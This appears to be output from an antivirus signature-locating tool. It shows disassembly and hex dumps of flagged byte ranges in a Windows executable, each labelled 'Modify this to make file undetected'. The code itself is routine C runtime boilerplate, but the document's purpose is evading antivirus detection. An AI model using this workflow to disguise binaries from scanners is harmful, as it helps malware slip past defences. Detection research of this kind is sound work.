0x17ca: ; CODE XREF from fcn.004023be @ 0x4023c5(x)
0x17ca: > 0x004023ca e8f4040000 call fcn.004028c3
0x17cf: 0x004023cf 84c0 test al, al
0x17d1: < 0x004023d1 7507 jne 0x4023da
0x17d3: 0x004023d3 e875050000 call fcn.0040294d
0x17d8: < 0x004023d8 ebed jmp 0x4023c7
0x17da: ; CODE XREF from fcn.004023be @ 0x4023d1(x)
0x17da: > 0x004023da b001 mov al, 1
0x17dc: 0x004023dc c3 ret
0x17dd: ; CALL XREF from fcn.00401ad0 @ 0x401afd(x)
0x17dd: ; CALL XREF from fcn.00401c41 @ 0x401c5e(x)
0x17dd: ; CALL XREF from fcn.00405f75 @ +0x92(x)
0x17dd: 23: fcn.004023dd (uint32_t arg_8h);
0x17dd: ; arg uint32_t arg_8h @ ebp+0x8
0x17dd: 0x004023dd 55 push ebp
0x17de: 0x004023de 8bec mov ebp, esp
0x17e0: 0x004023e0 807d0800 cmp byte [arg_8h], 0
0x17e4: < 0x004023e4 750a jne 0x4023f0
0x17e6: 0x004023e6 e80b050000 call fcn.004028f6
0x17eb: 0x004023eb e85d050000 call fcn.0040294d
0x17f0: ; CODE XREF from fcn.004023dd @ 0x4023e4(x)
0x17f0: > 0x004023f0 b001 mov al, 1
0x17f2: 0x004023f2 5d pop ebp
0x17f3: 0x004023f3 c3 ret
0x17f4: 0x004023f4 6a08 push 8 ; 8
0x17f6: 0x004023f6 68488f4100 push 0x418f48
0x17fb: 0x004023fb e8 invalid

Match 21: 6396 (size: 306)

Dominant. Modify this to make file undetected

.text

000018FC   03 00 00 83 C0 10 C3 E8 1B 03 00 00 83 C0 14 C3    ................
0000190C   CC CC CC CC 8B 4C 24 0C 0F B6 44 24 08 8B D7 8B    .....L$...D$....
0000191C   7C 24 04 85 C9 0F 84 3C 01 00 00 69 C0 01 01 01    |$.....<...i....
0000192C   01 83 F9 20 0F 86 DF 00 00 00 81 F9 80 00 00 00    ... ............
0000193C   0F 82 8B 00 00 00 0F BA 25 1C AC 41 00 01 73 09    ........%..A..s.
0000194C   F3 AA 8B 44 24 04 8B FA C3 0F BA 25 10 A0 41 00    ...D$......%..A.
0000195C   01 0F 83 B2 00 00 00 66 0F 6E C0 66 0F 70 C0 00    .......f.n.f.p..
0000196C   03 CF 0F 11 07 83 C7 10 83 E7 F0 2B CF 81 F9 80    ...........+....
0000197C   00 00 00 76 4C 8D A4 24 00 00 00 00 8D A4 24 00    ...vL..$......$.
0000198C   00 00 00 90 66 0F 7F 07 66 0F 7F 47 10 66 0F 7F    ....f...f..G.f..
0000199C   47 20 66 0F 7F 47 30 66 0F 7F 47 40 66 0F 7F 47    G f..G0f..G@f..G
000019AC   50 66 0F 7F 47 60 66 0F 7F 47 70 8D BF 80 00 00    Pf..G`f..Gp.....
000019BC   00 81 E9 80 00 00 00 F7 C1 00 FF FF FF 75 C5 EB    .............u..
000019CC   13 0F BA 25 10 A0 41 00 01 73 3E 66 0F 6E C0 66    ...%..A..s>f.n.f
000019DC   0F 70 C0 00 83 F9 20 72 1C F3 0F 7F 07 F3 0F 7F    .p.... r........
000019EC   47 10 83 C7 20 83 E9 20 83 F9 20 73 EC F7 C1 1F    G... .. .. s....
000019FC   00 00 00 74 62 8D 7C 0F E0 F3 0F 7F 07 F3 0F 7F    ...tb.|.........
00001A0C   47 10 8B 44 24 04 8B FA C3 F7 C1 03 00 00 00 74    G..D$..........t
00001A1C   0E 88 07 47 83 E9 01 F7 C1 03 00 00 00 75 F2 F7    ...G.........u..
00001A2C   C1 04                                              ..

0x18ec: 0x004024ec e832030000 call fcn.00402823
0x18f1: 0x004024f1 897014 mov dword [eax + 0x14], esi
0x18f4: 0x004024f4 e84b3c0000 call fcn.00406144
0x18f9: 0x004024f9 cc int3
0x18fa: ; CALL XREF from fcn.00401f21 @ +0x4b(x)
0x18fa: 9: fcn.004024fa ();
0x18fa: 0x004024fa e824030000 call fcn.00402823
0x18ff: 0x004024ff 83c010 add eax, 0x10 ; 16
0x1902: 0x00402502 c3 ret
0x1903: ; CALL XREF from fcn.00401f21 @ +0x55(x)
0x1903: 9: fcn.00402503 ();
0x1903: 0x00402503 e81b030000 call fcn.00402823
0x1908: 0x00402508 83c014 add eax, 0x14 ; 20
0x190b: 0x0040250b c3 ret
0x190c: 0x0040250c cc int3
0x190d: 0x0040250d cc int3
0x190e: 0x0040250e cc int3
0x190f: 0x0040250f cc int3
0x1910: ; XREFS: CALL 0x00401df0 CALL 0x00401e7a CALL 0x00406972
0x1910: ; XREFS: CALL 0x00406985 CALL 0x004078df CALL 0x00407965
0x1910: ; XREFS: CALL 0x00408444 CALL 0x004088a6 CALL 0x00409712
0x1910: ; XREFS: CALL 0x00409ba3 CALL 0x00409c2c CALL 0x00409d2f
0x1910: ; XREFS: CALL 0x0040a9c0 CALL 0x0040ae31 CALL 0x0040d412
0x1910: ; XREFS: CALL 0x0040d4fa CALL 0x0040d5a9 CALL 0x0040da88
0x1910: 346: fcn.00402510 (int32_t arg_4h, int32_t arg_8h, int32_t arg_ch);
0x1910: ; arg int32_t arg_4h @ esp+0x4
0x1910: ; arg int32_t arg_8h @ esp+0x8
0x1910: ; arg int32_t arg_ch @ esp+0xc
0x1910: 0x00402510 8b4c240c mov ecx, dword [arg_ch]
0x1914: 0x00402514 0fb6442408 movzx eax, byte [arg_8h]
0x1919: 0x00402519 8bd7 mov edx, edi
0x191b: 0x0040251b 8b7c2404 mov edi, dword [arg_4h]
0x191f: 0x0040251f 85c9 test ecx, ecx
0x1921: < 0x00402521 0f843c010000 je 0x402663
0x1927: 0x00402527 69c001010101 imul eax, eax, 0x1010101
0x192d: 0x0040252d 83f920 cmp ecx, 0x20 ; 32
0x1930: < 0x00402530 0f86df000000 jbe 0x402615
0x1936: 0x00402536 81f980000000 cmp ecx, 0x80 ; 128
0x193c: < 0x0040253c 0f828b000000 jb 0x4025cd
0x1942: 0x00402542 0fba251cac41. bt dword [0x41ac1c], 1
0x194a: < 0x0040254a 7309 jae 0x402555
0x194c: 0x0040254c f3aa rep stosb byte es:[edi], al
0x194e: 0x0040254e 8b442404 mov eax, dword [arg_4h]
0x1952: 0x00402552 8bfa mov edi, edx
0x1954: 0x00402554 c3 ret
0x1955: ; CODE XREF from fcn.00402510 @ 0x40254a(x)
0x1955: > 0x00402555 0fba2510a041. bt dword [0x41a010], 1
0x195d: < 0x0040255d 0f83b2000000 jae 0x402615
0x1963: 0x00402563 660f6ec0 movd xmm0, eax
0x1967: 0x00402567 660f70c000 pshufd xmm0, xmm0, 0
0x196c: 0x0040256c 03cf add ecx, edi
0x196e: 0x0040256e 0f1107 movups xmmword [edi], xmm0
0x1971: 0x00402571 83c710 add edi, 0x10 ; 16
0x1974: 0x00402574 83e7f0 and edi, 0xfffffff0 ; 4294967280
0x1977: 0x00402577 2bcf sub ecx, edi
0x1979: 0x00402579 81f980000000 cmp ecx, 0x80 ; 128
0x197f: < 0x0040257f 764c jbe 0x4025cd
0x1981: 0x00402581 8da424000000. lea esp, [esp]
0x1988: 0x00402588 8da424000000. lea esp, [esp]
0x198f: 0x0040258f 90 nop
0x1990: ; CODE XREF from fcn.00402510 @ 0x4025c9(x)
0x1990: > 0x00402590 660f7f07 movdqa xmmword [edi], xmm0
0x1994: 0x00402594 660f7f4710 movdqa xmmword [edi + 0x10], xmm0
0x1999: 0x00402599 660f7f4720 movdqa xmmword [edi + 0x20], xmm0
0x199e: 0x0040259e 660f7f4730 movdqa xmmword [edi + 0x30], xmm0
0x19a3: 0x004025a3 660f7f4740 movdqa xmmword [edi + 0x40], xmm0
0x19a8: 0x004025a8 660f7f4750 movdqa xmmword [edi + 0x50], xmm0
0x19ad: 0x004025ad 660f7f4760 movdqa xmmword [edi + 0x60], xmm0
0x19b2: 0x004025b2 660f7f4770 movdqa xmmword [edi + 0x70], xmm0
0x19b7: 0x004025b7 8dbf80000000 lea edi, [edi + 0x80]
0x19bd: 0x004025bd 81e980000000 sub ecx, 0x80 ; 128
0x19c3: 0x004025c3 f7c100ffffff test ecx, 0xffffff00 ; 4294967040
0x19c9: < 0x004025c9 75c5 jne 0x402590
0x19cb: < 0x004025cb eb13 jmp 0x4025e0
0x19cd: ; CODE XREFS from fcn.00402510 @ 0x40253c(x), 0x40257f(x)
0x19cd: > 0x004025cd 0fba2510a041. bt dword [0x41a010], 1
0x19d5: < 0x004025d5 733e jae 0x402615
0x19d7: 0x004025d7 660f6ec0 movd xmm0, eax
0x19db: 0x004025db 660f70c000 pshufd xmm0, xmm0, 0
0x19e0: ; CODE XREF from fcn.00402510 @ 0x4025cb(x)
0x19e0: > 0x004025e0 83f920 cmp ecx, 0x20 ; 32
0x19e3: < 0x004025e3 721c jb 0x402601
0x19e5: ; CODE XREF from fcn.00402510 @ 0x4025f7(x)
0x19e5: > 0x004025e5 f30f7f07 movdqu xmmword [edi], xmm0
0x19e9: 0x004025e9 f30f7f4710 movdqu xmmword [edi + 0x10], xmm0
0x19ee: 0x004025ee 83c720 add edi, 0x20 ; 32
0x19f1: 0x004025f1 83e920 sub ecx, 0x20 ; 32
0x19f4: 0x004025f4 83f920 cmp ecx, 0x20 ; 32
0x19f7: < 0x004025f7 73ec jae 0x4025e5
0x19f9: 0x004025f9 f7c11f000000 test ecx, 0x1f ; 31
0x19ff: < 0x004025ff 7462 je 0x402663
0x1a01: ; CODE XREF from fcn.00402510 @ 0x4025e3(x)
0x1a01: > 0x00402601 8d7c0fe0 lea edi, [edi + ecx - 0x20]
0x1a05: 0x00402605 f30f7f07 movdqu xmmword [edi], xmm0
0x1a09: 0x00402609 f30f7f4710 movdqu xmmword [edi + 0x10], xmm0
0x1a0e: 0x0040260e 8b442404 mov eax, dword [arg_4h]
0x1a12: 0x00402612 8bfa mov edi, edx
0x1a14: 0x00402614 c3 ret
0x1a15: ; CODE XREFS from fcn.00402510 @ 0x402530(x), 0x40255d(x), 0x4025d5(x)
0x1a15: > 0x00402615 f7c103000000 test ecx, 3 ; 3
0x1a1b: < 0x0040261b 740e je 0x40262b
0x1a1d: ; CODE XREF from fcn.00402510 @ 0x402629(x)
0x1a1d: > 0x0040261d 8807 mov byte [edi], al
0x1a1f: 0x0040261f 47 inc edi
0x1a20: 0x00402620 83e901 sub ecx, 1
0x1a23: 0x00402623 f7c103000000 test ecx, 3 ; 3
0x1a29: < 0x00402629 75f2 jne 0x40261d
0x1a2b: ; CODE XREF from fcn.00402510 @ 0x40261b(x)
0x1a2b: > 0x0040262b f7c104000000 test ecx, 4 ; 4
0x1a31: < 0x00402631 7408 je 0x40263b
0x1a33: 0x00402633 8907 mov dword [edi], eax
0x1a35: 0x00402635 83c704 add edi, 4
0x1a38: 0x00402638 83e904 sub ecx, 4
0x1a3b: ; CODE XREF from fcn.00402510 @ 0x402631(x)
0x1a3b: > 0x0040263b f7 invalid
0x1a3c: 0x0040263c c1 invalid
0x1a3d: 0x0040263d f8 clc

Match 23: 7348 (size: 170)

Dominant. Modify this to make file undetected

.text

00001CB4   00 59 5E 57 FF 15 4C 20 41 00 5F 8B C3 5B C3 68    .Y^W..L A._..[.h
00001CC4   07 28 40 00 E8 B9 01 00 00 A3 20 A0 41 00 59 83    .(@....... .A.Y.
00001CD4   F8 FF 75 03 32 C0 C3 68 24 AC 41 00 50 E8 51 02    ..u.2..h$.A.P.Q.
00001CE4   00 00 59 59 85 C0 75 07 E8 05 00 00 00 EB E5 B0    ..YY..u.........
00001CF4   01 C3 A1 20 A0 41 00 83 F8 FF 74 0E 50 E8 BB 01    ... .A....t.P...
00001D04   00 00 83 0D 20 A0 41 00 FF 59 B0 01 C3 56 57 BF    .... .A..Y...VW.
00001D14   4C AC 41 00 33 F6 6A 00 68 A0 0F 00 00 57 E8 4E    L.A.3.j.h....W.N
00001D24   02 00 00 83 C4 0C 85 C0 74 15 FF 05 64 AC 41 00    ........t...d.A.
00001D34   83 C6 18 83 C7 18 83 FE 18 72 DB B0 01 EB 07 E8    .........r......
00001D44   05 00 00 00 32 C0 5F 5E C3 56 8B 35 64 AC 41 00    ....2._^.V.5d.A.
00001D54   85 F6 74 20 6B C6 18 57 8D B8                      ..t k..W..

0x1ca7: 0x004028a7 59 pop ecx
0x1ca8: 0x004028a8 59 pop ecx
0x1ca9: < 0x004028a9 eb04 jmp 0x4028af
0x1cab: ; CODE XREF from fcn.00402831 @ 0x402897(x)
0x1cab: > 0x004028ab 8bde mov ebx, esi
0x1cad: 0x004028ad 33f6 xor esi, esi
0x1caf: ; CODE XREF from fcn.00402831 @ 0x4028a9(x)
0x1caf: > 0x004028af 56 push esi
0x1cb0: 0x004028b0 e8b2260000 call fcn.00404f67
0x1cb5: 0x004028b5 59 pop ecx
0x1cb6: 0x004028b6 5e pop esi
0x1cb7: ; CODE XREFS from fcn.00402831 @ 0x40285c(x), 0x402873(x)
0x1cb7: 0x004028b7 57 push edi ; DWORD dwErrCode
0x1cb8: 0x004028b8 ff154c204100 call dword [sym.imp.KERNEL32.dll_SetLastError] ; 0x41204c ; "$\x96\x01" ; VOID SetLastError(DWORD dwErrCode)
0x1cbe: 0x004028be 5f pop edi
0x1cbf: 0x004028bf 8bc3 mov eax, ebx
0x1cc1: 0x004028c1 5b pop ebx
0x1cc2: 0x004028c2 c3 ret
0x1cc3: ; CALL XREF from fcn.004023be @ 0x4023ca(x)
0x1cc3: 51: fcn.004028c3 ();
0x1cc3: 0x004028c3 6807284000 push 0x402807 ; int32_t arg_8h
0x1cc8: 0x004028c8 e8b9010000 call fcn.00402a86
0x1ccd: 0x004028cd a320a04100 mov dword [0x41a020], eax ; [0x41a020:4]=-1
0x1cd2: 0x004028d2 59 pop ecx
0x1cd3: 0x004028d3 83f8ff cmp eax, 0xffffffff
0x1cd6: < 0x004028d6 7503 jne 0x4028db
0x1cd8: ; CODE XREF from fcn.004028c3 @ 0x4028f1(x)
0x1cd8: > 0x004028d8 32c0 xor al, al
0x1cda: 0x004028da c3 ret
0x1cdb: ; CODE XREF from fcn.004028c3 @ 0x4028d6(x)
0x1cdb: > 0x004028db 6824ac4100 push 0x41ac24
0x1ce0: 0x004028e0 50 push eax
0x1ce1: 0x004028e1 e851020000 call fcn.00402b37
0x1ce6: 0x004028e6 59 pop ecx
0x1ce7: 0x004028e7 59 pop ecx
0x1ce8: 0x004028e8 85c0 test eax, eax
0x1cea: < 0x004028ea 7507 jne 0x4028f3
0x1cec: 0x004028ec e805000000 call fcn.004028f6
0x1cf1: < 0x004028f1 ebe5 jmp 0x4028d8
0x1cf3: ; CODE XREF from fcn.004028c3 @ 0x4028ea(x)
0x1cf3: > 0x004028f3 b001 mov al, 1
0x1cf5: 0x004028f5 c3 ret
0x1cf6: ; CALL XREF from fcn.004023dd @ 0x4023e6(x)
0x1cf6: ; CALL XREF from fcn.004028c3 @ 0x4028ec(x)
0x1cf6: 27: fcn.004028f6 ();
0x1cf6: 0x004028f6 a120a04100 mov eax, dword [0x41a020] ; [0x41a020:4]=-1
0x1cfb: 0x004028fb 83f8ff cmp eax, 0xffffffff
0x1cfe: < 0x004028fe 740e je 0x40290e
0x1d00: 0x00402900 50 push eax ; int32_t arg_8h
0x1d01: 0x00402901 e8bb010000 call fcn.00402ac1
0x1d06: 0x00402906 830d20a04100. or dword [0x41a020], 0xffffffff ; [0x41a020:4]=-1
0x1d0d: 0x0040290d 59 pop ecx
0x1d0e: ; CODE XREF from fcn.004028f6 @ 0x4028fe(x)
0x1d0e: > 0x0040290e b001 mov al, 1
0x1d10: 0x00402910 c3 ret
0x1d11: ; CALL XREF from fcn.004023be @ 0x4023be(x)
0x1d11: 60: fcn.00402911 ();
0x1d11: 0x00402911 56 push esi
0x1d12: 0x00402912 57 push edi
0x1d13: 0x00402913 bf4cac4100 mov edi, 0x41ac4c
0x1d18: 0x00402918 33f6 xor esi, esi
0x1d1a: ; CODE XREF from fcn.00402911 @ 0x40293d(x)
0x1d1a: > 0x0040291a 6a00 push 0 ; int32_t arg_10h
0x1d1c: 0x0040291c 68a00f0000 push 0xfa0 ; 4000 ; DWORD dwSpinCount
0x1d21: 0x00402921 57 push edi ; LPCRITICAL_SECTION lpCriticalSection
0x1d22: 0x00402922 e84e020000 call fcn.00402b75
0x1d27: 0x00402927 83c40c add esp, 0xc
0x1d2a: 0x0040292a 85c0 test eax, eax
0x1d2c: < 0x0040292c 7415 je 0x402943
0x1d2e: 0x0040292e ff0564ac4100 inc dword [0x41ac64]
0x1d34: 0x00402934 83c618 add esi, 0x18 ; 24
0x1d37: 0x00402937 83c718 add edi, 0x18 ; 24
0x1d3a: 0x0040293a 83fe18 cmp esi, 0x18 ; 24
0x1d3d: < 0x0040293d 72db jb 0x40291a
0x1d3f: 0x0040293f b001 mov al, 1
0x1d41: < 0x00402941 eb07 jmp 0x40294a
0x1d43: ; CODE XREF from fcn.00402911 @ 0x40292c(x)
0x1d43: > 0x00402943 e805000000 call fcn.0040294d
0x1d48: 0x00402948 32c0 xor al, al
0x1d4a: ; CODE XREF from fcn.00402911 @ 0x402941(x)
0x1d4a: > 0x0040294a 5f pop edi
0x1d4b: 0x0040294b 5e pop esi
0x1d4c: 0x0040294c c3 ret
0x1d4d: ; CALL XREF from fcn.004023be @ 0x4023d3(x)
0x1d4d: ; CALL XREF from fcn.004023dd @ 0x4023eb(x)
0x1d4d: ; CALL XREF from fcn.00402911 @ 0x402943(x)
0x1d4d: 47: fcn.0040294d ();
0x1d4d: 0x0040294d 56 push esi
0x1d4e: 0x0040294e 8b3564ac4100 mov esi, dword [0x41ac64] ; [0x41ac64:4]=0
0x1d54: 0x00402954 85f6 test esi, esi
0x1d56: < 0x00402956 7420 je 0x402978
0x1d58: 0x00402958 6bc618 imul eax, esi, 0x18
0x1d5b: 0x0040295b 57 push edi
0x1d5c: 0x0040295c 8db834ac4100 lea edi, [eax + 0x41ac34]
0x1d62: ; CODE XREF from fcn.0040294d @ 0x402975(x)
0x1d62: 0x00402962 57 push edi ; LPCRITICAL_SECTION lpCriticalSection
0x1d63: 0x00402963 ff1558204100 call dword [sym.imp.KERNEL32.dll_DeleteCriticalSection] ; 0x412058 ; "d\x96\x01" ; VOID DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
0x1d69: 0x00402969 ff invalid
0x1d6a: 0x0040296a 0d invalid
0x1d6b: 0x0040296b 64ac lodsb al, byte fs:[esi]
0x1d6d: 0x0040296d 41 inc ecx

Match 24: 7586 (size: 68)

Dominant. Modify this to make file undetected

.text

00001DA2   C3 55 8B EC 51 53 56 57 8B 7D 08 EB 6F 8B 07 8D    .U..QSVW.}..o...
00001DB2   1C 85 A4 AC 41 00 8B 33 85 F6 74 07 83 FE FF 75    ....A..3..t....u
00001DC2   76 EB 56 8B 04 85 20 2B 41 00 68 00 08 00 00 6A    v.V... +A.h....j
00001DD2   00 50 89 45 FC FF 15 78 20 41 00 8B F0 85 F6 75    .P.E...x A.....u
00001DE2   47 FF 15 48                                        G..H

0x1d94: 0x00402994 55 push ebp
0x1d95: 0x00402995 51 push ecx
0x1d96: 0x00402996 50 push eax
0x1d97: 0x00402997 58 pop eax
0x1d98: 0x00402998 59 pop ecx
0x1d99: 0x00402999 5d pop ebp
0x1d9a: 0x0040299a 59 pop ecx
0x1d9b: 0x0040299b 5b pop ebx
0x1d9c: 0x0040299c c20400 ret 4
0x1d9f: 0x0040299f cc int3
0x1da0: ; CALL XREF from fcn.00402670 @ 0x4026f7(x)
0x1da0: 3: fcn.004029a0 ();
0x1da0: 0x004029a0 ffd0 call eax
0x1da2: 0x004029a2 c3 ret
0x1da3: ; CALL XREF from fcn.00402a3d @ 0x402a5f(x)
0x1da3: 154: fcn.004029a3 (int32_t arg_8h, uint32_t arg_ch);
0x1da3: ; arg int32_t arg_8h @ ebp+0x8
0x1da3: ; arg uint32_t arg_ch @ ebp+0xc
0x1da3: ; var int32_t var_4h @ ebp-0x4
0x1da3: 0x004029a3 55 push ebp
0x1da4: 0x004029a4 8bec mov ebp, esp
0x1da6: 0x004029a6 51 push ecx
0x1da7: 0x004029a7 53 push ebx
0x1da8: 0x004029a8 56 push esi
0x1da9: 0x004029a9 57 push edi
0x1daa: 0x004029aa 8b7d08 mov edi, dword [arg_8h]
0x1dad: < 0x004029ad eb6f jmp 0x402a1e
0x1daf: ; CODE XREF from fcn.004029a3 @ 0x402a21(x)
0x1daf: 0x004029af 8b07 mov eax, dword [edi]
0x1db1: 0x004029b1 8d1c85a4ac41. lea ebx, [eax*4 + 0x41aca4]
0x1db8: 0x004029b8 8b33 mov esi, dword [ebx]
0x1dba: 0x004029ba 85f6 test esi, esi
0x1dbc: < 0x004029bc 7407 je 0x4029c5
0x1dbe: 0x004029be 83feff cmp esi, 0xffffffff
0x1dc1: < 0x004029c1 7576 jne 0x402a39
0x1dc3: < 0x004029c3 eb56 jmp 0x402a1b
0x1dc5: ; CODE XREF from fcn.004029a3 @ 0x4029bc(x)
0x1dc5: > 0x004029c5 8b0485202b41. mov eax, dword [eax*4 + 0x412b20]
0x1dcc: 0x004029cc 6800080000 push 0x800 ; 2048
0x1dd1: 0x004029d1 6a00 push 0 ; HANDLE hFile
0x1dd3: 0x004029d3 50 push eax ; LPCWSTR lpLibFileName
0x1dd4: 0x004029d4 8945fc mov dword [var_4h], eax
0x1dd7: 0x004029d7 ff1578204100 call dword [sym.imp.KERNEL32.dll_LoadLibraryExW] ; 0x412078 ; HMODULE LoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags)
0x1ddd: 0x004029dd 8bf0 mov esi, eax
0x1ddf: 0x004029df 85f6 test esi, esi
0x1de1: < 0x004029e1 7547 jne 0x402a2a
0x1de3: 0x004029e3 ff1548204100 call dword [sym.imp.KERNEL32.dll_GetLastError] ; 0x412048 ; DWORD GetLastError(void)
0x1de9: 0x004029e9 83f857 cmp eax, 0x57 ; 'W' ; 87
0x1dec: < 0x004029ec 7528 jne 0x402a16
0x1dee: 0x004029ee 8b75fc mov esi, dword [var_4h]
0x1df1: 0x004029f1 6a07 push 7 ; 7
0x1df3: 0x004029f3 68 invalid ; 0x412bb8 ; u"api-ms-"
0x1df4: 0x004029f4 b8 invalid
0x1df5: 0x004029f5 2b invalid

Match 25: 7688 (size: 204)

Dominant. Modify this to make file undetected

.text

00001E08   00 56 FF 15 78 20 41 00 8B F0 85 F6 75 14 83 C8    .V..x A.....u...
00001E18   FF 87 03 83 C7 04 3B 7D 0C 75 8C 33 C0 5F 5E 5B    ......;}.u.3._^[
00001E28   C9 C3 8B C6 87 03 85 C0 74 07 56 FF 15 70 20 41    ........t.V..p A
00001E38   00 8B C6 EB E8 55 8B EC 8B 45 08 56 57 8D 3C 85    .....U...E.VW.<.
00001E48   B0 AC 41 00 8B 07 83 CE FF 3B C6 74 2B 85 C0 75    ..A......;.t+..u
00001E58   29 FF 75 14 FF 75 10 E8 3F FF FF FF 59 59 85 C0    ).u..u..?...YY..
00001E68   74 14 FF 75 0C 50 FF 15 74 20 41 00 85 C0 74 06    t..u.P..t A...t.
00001E78   8B C8 87 0F EB 04 87 37 33 C0 5F 5E 5D C3 55 8B    .......73._^].U.
00001E88   EC 56 68 D0 2B 41 00 68 C8 2B 41 00 68 D0 2B 41    .Vh.+A.h.+A.h.+A
00001E98   00 6A 00 E8 9D FF FF FF 8B F0 83 C4 10 85 F6 74    .j.............t
00001EA8   10 FF 75 08 8B CE FF 15 20 21 41 00 FF D6 5E 5D    ..u..... !A...^]
00001EB8   C3 5E 5D FF 25 60 20 41 00 55 8B EC 56 68 E4 2B    .^].%` A.U..Vh.+
00001EC8   41 00 68 DC 2B 41 00 68 E4 2B 41 00                A.h.+A.h.+A.

0x1df8: 0x004029f8 56 push esi
0x1df9: 0x004029f9 e80a3f0000 call fcn.00406908
0x1dfe: 0x004029fe 83c40c add esp, 0xc
0x1e01: 0x00402a01 85c0 test eax, eax
0x1e03: < 0x00402a03 7411 je 0x402a16
0x1e05: 0x00402a05 6a00 push 0
0x1e07: 0x00402a07 6a00 push 0 ; HANDLE hFile
0x1e09: 0x00402a09 56 push esi ; LPCWSTR lpLibFileName
0x1e0a: 0x00402a0a ff1578204100 call dword [sym.imp.KERNEL32.dll_LoadLibraryExW] ; 0x412078 ; HMODULE LoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags)
0x1e10: 0x00402a10 8bf0 mov esi, eax
0x1e12: 0x00402a12 85f6 test esi, esi
0x1e14: < 0x00402a14 7514 jne 0x402a2a
0x1e16: ; CODE XREFS from fcn.004029a3 @ 0x4029ec(x), 0x402a03(x)
0x1e16: > 0x00402a16 83c8ff or eax, 0xffffffff ; -1
0x1e19: 0x00402a19 8703 xchg dword [ebx], eax
0x1e1b: ; CODE XREF from fcn.004029a3 @ 0x4029c3(x)
0x1e1b: 0x00402a1b 83c704 add edi, 4
0x1e1e: ; CODE XREF from fcn.004029a3 @ 0x4029ad(x)
0x1e1e: 0x00402a1e 3b7d0c cmp edi, dword [arg_ch]
0x1e21: < 0x00402a21 758c jne 0x4029af
0x1e23: 0x00402a23 33c0 xor eax, eax
0x1e25: ; CODE XREF from fcn.004029a3 @ 0x402a3b(x)
0x1e25: > 0x00402a25 5f pop edi
0x1e26: 0x00402a26 5e pop esi
0x1e27: 0x00402a27 5b pop ebx
0x1e28: 0x00402a28 c9 leave
0x1e29: 0x00402a29 c3 ret
0x1e2a: ; CODE XREFS from fcn.004029a3 @ 0x4029e1(x), 0x402a14(x)
0x1e2a: > 0x00402a2a 8bc6 mov eax, esi
0x1e2c: 0x00402a2c 8703 xchg dword [ebx], eax
0x1e2e: 0x00402a2e 85c0 test eax, eax
0x1e30: < 0x00402a30 7407 je 0x402a39
0x1e32: 0x00402a32 56 push esi ; HMODULE hLibModule
0x1e33: 0x00402a33 ff1570204100 call dword [sym.imp.KERNEL32.dll_FreeLibrary] ; 0x412070 ; BOOL FreeLibrary(HMODULE hLibModule)
0x1e39: ; CODE XREFS from fcn.004029a3 @ 0x4029c1(x), 0x402a30(x)
0x1e39: > 0x00402a39 8bc6 mov eax, esi
0x1e3b: < 0x00402a3b ebe8 jmp 0x402a25
0x1e3d: ; CALL XREF from fcn.00402a86 @ 0x402a9b(x)
0x1e3d: ; CALL XREF from fcn.00402ac1 @ 0x402ad6(x)
0x1e3d: ; CALL XREF from fcn.00402afc @ 0x402b11(x)
0x1e3d: ; CALL XREF from fcn.00402b37 @ 0x402b4c(x)
0x1e3d: ; CALL XREF from fcn.00402b75 @ 0x402b8a(x)
0x1e3d: 73: fcn.00402a3d (int32_t arg_8h, LPCSTR lpProcName, int32_t arg_10h, int32_t arg_14h);
0x1e3d: ; arg int32_t arg_8h @ ebp+0x8
0x1e3d: ; arg LPCSTR lpProcName @ ebp+0xc
0x1e3d: ; arg int32_t arg_10h @ ebp+0x10
0x1e3d: ; arg int32_t arg_14h @ ebp+0x14
0x1e3d: 0x00402a3d 55 push ebp
0x1e3e: 0x00402a3e 8bec mov ebp, esp
0x1e40: 0x00402a40 8b4508 mov eax, dword [arg_8h]
0x1e43: 0x00402a43 56 push esi
0x1e44: 0x00402a44 57 push edi
0x1e45: 0x00402a45 8d3c85b0ac41. lea edi, [eax*4 + 0x41acb0]
0x1e4c: 0x00402a4c 8b07 mov eax, dword [edi]
0x1e4e: 0x00402a4e 83ceff or esi, 0xffffffff ; -1
0x1e51: 0x00402a51 3bc6 cmp eax, esi
0x1e53: < 0x00402a53 742b je 0x402a80
0x1e55: 0x00402a55 85c0 test eax, eax
0x1e57: < 0x00402a57 7529 jne 0x402a82
0x1e59: 0x00402a59 ff7514 push dword [arg_14h] ; uint32_t arg_ch
0x1e5c: 0x00402a5c ff7510 push dword [arg_10h] ; int32_t arg_8h
0x1e5f: 0x00402a5f e83fffffff call fcn.004029a3
0x1e64: 0x00402a64 59 pop ecx
0x1e65: 0x00402a65 59 pop ecx
0x1e66: 0x00402a66 85c0 test eax, eax
0x1e68: < 0x00402a68 7414 je 0x402a7e
0x1e6a: 0x00402a6a ff750c push dword [lpProcName] ; LPCSTR lpProcName
0x1e6d: 0x00402a6d 50 push eax ; HMODULE hModule
0x1e6e: 0x00402a6e ff1574204100 call dword [sym.imp.KERNEL32.dll_GetProcAddress] ; 0x412074 ; FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
0x1e74: 0x00402a74 85c0 test eax, eax
0x1e76: < 0x00402a76 7406 je 0x402a7e
0x1e78: 0x00402a78 8bc8 mov ecx, eax
0x1e7a: 0x00402a7a 870f xchg dword [edi], ecx
0x1e7c: < 0x00402a7c eb04 jmp 0x402a82
0x1e7e: ; CODE XREFS from fcn.00402a3d @ 0x402a68(x), 0x402a76(x)
0x1e7e: > 0x00402a7e 8737 xchg dword [edi], esi
0x1e80: ; CODE XREF from fcn.00402a3d @ 0x402a53(x)
0x1e80: > 0x00402a80 33c0 xor eax, eax
0x1e82: ; CODE XREFS from fcn.00402a3d @ 0x402a57(x), 0x402a7c(x)
0x1e82: > 0x00402a82 5f pop edi
0x1e83: 0x00402a83 5e pop esi
0x1e84: 0x00402a84 5d pop ebp
0x1e85: 0x00402a85 c3 ret
0x1e86: ; CALL XREF from fcn.004028c3 @ 0x4028c8(x)
0x1e86: 59: fcn.00402a86 (int32_t arg_8h);
0x1e86: ; arg int32_t arg_8h @ ebp+0x8
0x1e86: 0x00402a86 55 push ebp
0x1e87: 0x00402a87 8bec mov ebp, esp
0x1e89: 0x00402a89 56 push esi
0x1e8a: 0x00402a8a 68d02b4100 push str.FlsAlloc ; 0x412bd0 ; "FlsAlloc" ; PFLS_CALLBACK_FUNCTION lpCallback
0x1e8f: 0x00402a8f 68c82b4100 push 0x412bc8
